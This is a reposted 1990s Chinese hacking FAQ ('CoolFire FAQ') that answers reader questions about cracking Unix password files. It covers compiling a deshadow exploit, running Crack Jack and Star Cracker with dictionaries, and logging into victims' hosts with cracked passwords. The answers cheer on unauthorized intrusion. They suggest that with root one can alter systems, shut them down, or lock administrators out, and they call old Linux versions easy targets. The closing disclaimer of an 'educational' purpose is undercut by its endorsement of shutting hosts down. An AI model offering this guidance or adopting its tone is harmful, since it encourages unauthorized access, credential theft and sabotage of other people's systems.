-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- **** CoolFire FAQ **** 实在很想帮大家解决问题, 但是请不要寄来 "请帮我 Crack xxx ISP" 的信件,如果我们的 Home Page 有甚麽问题, 或是你在 Crack 所遭遇到的问题, 欢迎大家来信讨论!! Harlem Liang网友所建议的 StarKrack也是一个不错的 Password Crack 软体, 请大家也帮忙试试喔~~~~ [Q1]你在 Coolhc~4 中讲到 Shadow.c 可以用 unix 里的 cc 指令但如何 Keyin 例如: ms.hinet.net/harlem/>CC之後呢? [A1]在 Unix 系统中下以下的指令: cc -o deshadow shadow.c 最後所产生出来的deshadow 就是执行档名了Unix 是一个不错的系统, 尤其是想要学习 Crack Password或入侵的中H都一定踯n经过这个门槛, 大家可以多看看一些有关 Unix 的书籍, 当然 c 语言也是其必须的罗~~~:) [Q2]deshadow 是在 Unix 下执行,还是在Dos下执行, 用 C 语言可不可以转换?可不可以把shadow的 passwd拿回来再转换?[A2]呵~~ 既然 /etc/passwd 已经 shadow 了! 你拿回来的当然是没有用的密码档,只能知道其 user 的名字而已, 所以如果要拿回来 Crack 当然是不可能的, 而 DeShadow 是针对 Unix系统的漏洞所设计的,且只能在 Unix 上尝试 DeShadow.. 故请在 Unix 上 Compiler 再执行,当然有些系统可能已经将漏洞补上了, 或因为网路安全的问题不提供使用者编译档案,那就只好使用其它方法罗~~~:) [Q3]我找到root的密码了! 用kOS的字典档XXXX的etc/passwd 用Star Cracker,只花了1小时30分就找到了!找到root的密码可以做甚麽呢? 你有没有用kOS crack XXXX的 passwd花了多久time?[A3]哇 !! 恭喜你罗!(注: XXXX 部份为 "马赛克" ) 找到 root 的密码後能作甚麽 ??? 呵.. 随便你罗, 想要作甚麽就作甚麽, 当然可以更进一步的得到更多的东西,你可以任意修改系统(小心触法), 也可以在心情不好的时候把系统 "关" 起来, 不让别人上线, 亦可以更改 root 的密码,让他们的 root 没有办法维护系统, 反正系统是你的了! 问我能作甚麽 ?? 我也不能回答你..... :)我当然也 Crack 过, 不过时间嘛... 没算, 因为我都是用好几台电脑在跑的 (利用下班时间),所以操作环境跟你不同罗!! [Q4]看hopenet知道linux的bin/login中有一个很大漏洞可以取得root的权限是怎麽一回事呢? [A4]该文章附有一 URL 位址, 请连上去看看後就知道了, 现在也有许多人讨论这些东西,不过很多公司用的 Linux 都还是 1.x.x 版的, 很好 Crack... 试试吧! 保证你会爱上它~~ 呵~ [Q5]Cyberspace是什麽样的组织? [A5]嗯 ?? 连这种问题都有人问呀~~~ 请到 <a href="http://www.cyberspace.org" target="_blank"><a href="http://www.cyberspace.org" target="_blank">www.cyberspace.org</a></a> 看看就知道罗~~~ [Q6] I have a question for the 'GZ' file format. [A6]对呀!! 放了字典档的连结在首页上就出现了很多问 .z .gz 档要怎麽解的问题了,我的系统安装了 Winzip, Pkunzip, Gzip 後 .z .gz 就变成 Winzip 可解的档案了,知道该怎麽办了吧~~ [Q7]我*前从你的站台连至GlobalKOS下传jack14的辅助工具,不过我的连线速度太慢,所以一直 抓不回来,你可以 mirror 回来吗?[A7]这种问题我也只好 Say "SORRY" 罗, 我们的首页上已经放了很多东西了,而且也都是开放让同好们 "免费" 参观及抓取 (绝不收费啦!!), 且一个 kOS 就要 1.xxMB 那麽大,我基於要放更多东西的关系提供了一个 Hot Link 在上面, 请各位 "努力" 吧!!不然换条线试试, 你用的可能是学术网路吧!! 可不可以在非巅锋时间抓呢?? 还是弄个 ftp Server 帮你抓,信箱够大的话可以用 Mail FTP... 等, 都可以达到你的目地的~~~:) [Q8]我去找到了一个站的密码档,之後我执行JACK却出现 Virtual mode not supportedwithout VCPI的讯息,请问是什麽错误?[A8]这位网友可能是使用 Windoz 95 的 DOS BOX 所出现的讯息吧!! VCPI 要在EMM386.EXE 挂上後有效, 也就是说最好在纯 DOS 下挂上 EMM386.EXE 再使用 Crack Jack,另外使用的时候也不要在 EMM386.EXE 後下 NOEMS 的参数, 不然 CJack 也不会理你, 至於怎麽在Win95 的DOS BOX 中使用 CJack ?? 我也不知道! 有没有人试成功的, 请出个声吧!! [Q9]我如果由www得到密码档,破解之後我要从那输入密码? [A9]嗯, 很简单呀!! 启动你的 Telnet 软体 (NetTerm... Telnet... etc.) 连线到<a href="http://www.xxx.xxx.xxx" target="_blank"><a href="http://www.xxx.xxx.xxx" target="_blank">www.xxx.xxx.xxx</a></a> 去, 然後就可以输入密码, 依正常程序 Login 就成了!! 加油喔~~ Enjoy Hacking~:) [Q10]我无法将字典档抓下来, 可否用E-MAIL寄给我 [A10]........ 谁来帮我回答~~~~? **** 後语 **** 作这份东西的动机是 "兴趣", 入侵到他人的主机是属於非法的行为?但是我并没有作任何的破坏动作, 纯粹就是 "好玩", 当然也因此突显出许多站台的安全性问题,所以这份文章也就有点"教育"这些破站台的意味存在. 有许多的网有对 CoolFire 充满了信心, 寄了许多站台的网址来"求破",呵.. 我只能看看, 不能够将每天的心力都投注在上面, 网友们也许比较有时间吧!!大家可以一起到 Hacker 论坛讨论讨论. 我们的首页感谢大家的支持, 现在人数.... 呵, 已经不准了!不晓得是哪位网友跑到咱们的 Cgi-Count去动了手脚, 原本过年前还在 32xx 的人, 现在已经倒退了, 暂且不管网友们是如何想的,下次若再出现这样的状况, 这个首页可能因此关门大吉罗~~~ ** 不要 Crack 这个首页的 ISP!!!! 否则 FETAG Sofeware's Hacking Page将会完全关闭, 再 也不寻找其它的地方来放置, 希望给你的是使用电脑的 "知识",不要利用它来夺取任何的"权利", 本首页著重的是教育, 而不是一　的教导攻击的方法, 希望大家对於政府机关(org.tw) 或教育机构 (edu.tw) 不要作任何的破坏!! 还有我的 ISP......:D 谢谢大家的支持~ ------ 再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上 (又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

白鹤 · 发表于 2005-7-22 22:09:09

未完待续下次再发!

		自动登录	找回密码
密码			注册